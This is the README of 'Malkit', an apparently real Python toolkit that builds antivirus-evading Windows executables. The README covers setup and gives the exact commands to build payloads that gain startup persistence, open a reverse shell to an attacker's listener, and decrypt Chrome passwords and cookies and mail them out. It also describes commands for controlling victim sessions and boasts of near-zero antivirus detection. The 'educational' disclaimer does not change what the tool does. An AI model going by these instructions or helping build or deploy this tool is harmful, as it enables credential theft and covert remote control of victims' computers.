Malkit is a Python-based console application that generates runtime-decrypted, undetectable Windows executables. It has the following features:
- Copying itself into startup as a legitimate application
- Connecting back to an attacker via reverse shell
- Custom listener with upload, download and modular capability (in progress)
- Chromepass feature:
- Decrypt Chrome saved passwords as well as all cookies
- Send a file with the login/password combinations remotely (email or reverse shell)
- Send a file with all the extracted cookies as well as another file with possible email-related cookies
- Custom icon
- Custom error message
- Accurate location reporting. It can detect and send back a victim's accurate geolocation (not ip-based) (X)
- Easy to use
- Completely undetectable by AV engines
Features marked with an X are still in development and aren't fully working but are already complete in internal testing.
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed:
- From build_malware
- From build_chromepass
- Both scans yielded the result: 1/69 detections. The sole detection is a false positive by Sangfor Engine Zero. I tried submitting a simple hello world program for analysis and the same AV detected it as malware as well.
- This is an educational project first and foremost, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
For this application you need:
- Python - Only tested on 3.7.5 in an Anaconda environment, but should work in 3.6+ (doesn't work in 3.8 yet). No need to download it from here; just follow Installation below.
- VS build tools - No longer needed as of the last update (they were previously required to build some dependencies, with a restart before proceeding to Installation). However, should you not be able to install the requirements.txt, open the file and downgrade pexe37 to 0.9.6.4 and darkarp to 3.4 (ONLY if you get errors when installing the requirements.txt; otherwise, just go to Installation).
Chromepass requires Python 3.6+ to run. It has been tested on a full Anaconda installation, but it doesn't necessarily require it. It doesn't work with Python 3.8 yet. The instructions for the full setup are below.
Setup Anaconda environment:
- Visit Anaconda and download the graphical installer for windows.
- Run the installer and make sure you select the checkbox "Add conda to path", even though it isn't recommended.
- Open up a new powershell window as administrator and run:
Set-ExecutionPolicy RemoteSigned
- Press A when it prompts you.
- Close this window
- Open up a normal powershell and enable conda to use it:
conda init powershell
- Close and open a new powershell and update conda:
conda update conda
- Create a new anaconda environment:
conda create -n malkit python=3.7
- Activate your environment:
conda activate malkit
- Note: Every time you open a new powershell and want to run malkit you need to activate your environment.
Clone the Repository and access its directory:
> git clone https://github.com/darkarp/malkit.git
> cd malkit
Install the dependencies:
> pip install -r requirements.txt
If any errors occur, make sure you're running in the proper environment (if applicable) and that you have Python 3.6+ < 3.8 (preferably 3.7.5). If the errors persist, try:
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt
If any errors still persist, make sure you have the following installed:
- Show the help screen
python malkit.py -h
usage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...
positional arguments:
{build_listener, build_malware, build_chromepass}
optional arguments:
-h, --help show this help message and exit
- Access the help menu for individual arguments
python malkit.py build_chromepass -h
usage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]
[--no_error]
[--errormsg Error message to appear]
[--address Email address to send details to, if Email was chosen]
[--port Port for reverse connection, if Reverse shell was chosen.]
[--host Host reverse connection, if Reverse shell was chosen.]
optional arguments:
-h, --help show this help message and exit
--load
--email
--reverse_shell
--no_error
--errormsg Error message to appear
--address Email address to send details to, if Email was chosen
--port Port for reverse connection, if Reverse shell was chosen.
--host Host reverse connection, if Reverse shell was chosen.
example:
python malkit.py build_chromepass --email --address myemail@gmail.com
python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444
python malkit.py build_chromepass --load myfile.conf
- Building an executable that grabs and sends chrome-saved passwords through email:
python malkit.py build_chromepass --email --address youremailaddress@yourdomain.com
- Creating a persistent reverse_shell with additional features:
python malkit.py build_malware --host 127.0.0.1 -p 444
- Replace the host with your external/internal ip as needed
- Replace the port as needed
- Make sure you build the listener as well and run it.
- Creating a listener for the malware:
python malkit.py build_listener -p 444
- This is the listener for the malware
- While in the shell, you can use the list command to see active sessions.
- You can interact with a session by using the command interact::SESSION_NUMBER, where SESSION_NUMBER is the number of the session you want to connect with.
- To go back into listener mode after interacting with a session, use the command <bg or <background
- Other commands while interacting have been added but are still experimental:
- <download - Downloads a file from the server
- Reducing malware file size to around 4-6 MB, possible by making the original malware download the rest of the payload via the reverse connection.
- Sending real-time precise location of the victim (completed, releases next update)
- Also steal Firefox passwords (completed, releases next update)
- Also steal passwords from other programs, such as keychains (in progress)
- Better encryption (Completed, releases into beta version)
If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement, please report it on the issues page as well.
Please follow the templates shown when creating the issue.
For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking
If you wish to contact me, you can do so via: marionascimento@itsec.bz
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.